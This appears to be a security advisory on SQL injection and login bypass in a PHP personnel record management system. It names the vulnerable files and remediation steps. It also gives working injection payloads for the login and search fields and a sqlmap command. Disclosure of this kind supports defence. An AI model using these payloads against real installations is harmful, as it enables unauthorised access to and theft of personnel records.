Personnel Record Management System SQL Injection Vulnerability and Auth Bypass POC

# Personnel Record Management System SQL Injection Vulnerability ## Vulnerability Overview | Item | Content | |:---|:---| | **Vulnerability Name** | Personnel Record Management System SQL Injection Vulnerability | | **Vulnerability Type** | SQL Injection (SQLi) | | **Affected Platform** | Sourcecodester (open source code sharing platform, over 29,000 downloads) | | **Project Link** | sourcecodester.com/php/5107/record-management-system.html | --- ## Impact Scope ### Affected Components - **Login Module**: `index.php` - **User Management Module**: `add_user.php`, `search_user.php` ### Vulnerability Details #### Root Cause 1: Global SQL Injection & Authentication Bypass - **Vulnerable File**: `index.php` (Lines 38-47) - **Issue**: Authentication query uses direct string concatenation without filtering `$UserName` and `$Password` parameters - **Risk**: Attackers can inject arbitrary SQL logic to completely bypass authentication mechanisms and gain administrator backend access #### Root Cause 2: Fuzzy Search SQL Injection - **Vulnerable File**: `search_user.php` (Lines 142-147) - **Issue**: `search` POST parameter is directly embedded into SQL `LIKE` clause without any preprocessing - **Risk**: Supports Boolean-based blind injection, time-based blind injection, UNION injection, and other attack methods --- ## POC Code/Exploit Payloads ### 1. Global SQL Injection & Authentication Bypass | Type | Payload | |:---|:---| | **Boolean-based Blind Injection** | `UserName=123' RLIKE (SELECT (CASE WHEN (1470=1470) THEN 123 ELSE 0x28 END))-- GxAC&Password='OR '1'='1&Login=` | | **Time-based Blind Injection** | `UserName=123' AND (SELECT 4771 FROM (SELECT(SLEEP(5)))xADf)-- GwA&Password='OR '1'='1&Login=` | **Result**: Attacker successfully bypasses login mechanism and enters the management backend --- ### 2. Fuzzy Search SQL Injection | Type | Payload | |:---|:---| | **Boolean-based Blind Injection** | `search=-5641' OR 7541=7541#` | | **Time-based Blind Injection** | `search=test' AND (SELECT 8891 FROM (SELECT(SLEEP(5)))fApJ)-- Vozp` | | **UNION Injection** | `search=test' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a767171,0x614364d9544e0668d01407a5885466576876e654656255556985453455555974524566a784757,0x717a787a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#` | --- ### SQLMap Verification Command ```bash sqlmap -r search_req.txt -p search --dbs --batch ``` --- ## Remediation Solutions | Priority | Measure | Description | |:---|:---|:---| | 1 | **Patch Management** | Closely monitor official security advisories and promptly deploy security patches | | 2 | **Use Prepared Statements** | Completely abandon direct string concatenation; switch to PDO or MySQLi parameterized queries to strictly separate code logic from user data | | 3 | **Strict Input Validation** | Follow the "never trust external input" principle; implement strict type validation and filtering for all frontend-backend data exchange | | 4 | **Principle of Least Privilege** | Assign independent database accounts to the system with only necessary read/write permissions; prohibit root connections to the database | | 5 | **Environment Configuration & Monitoring** | Disable PHP error display in production environment (`display_errors = off`); deploy WAF to intercept common injection attacks; conduct regular security code audits |

Goal Reached Thanks to every supporter — we hit 100%!

Personnel Record Management System SQL Injection Vulnerability and Auth Bypass POC

More from this source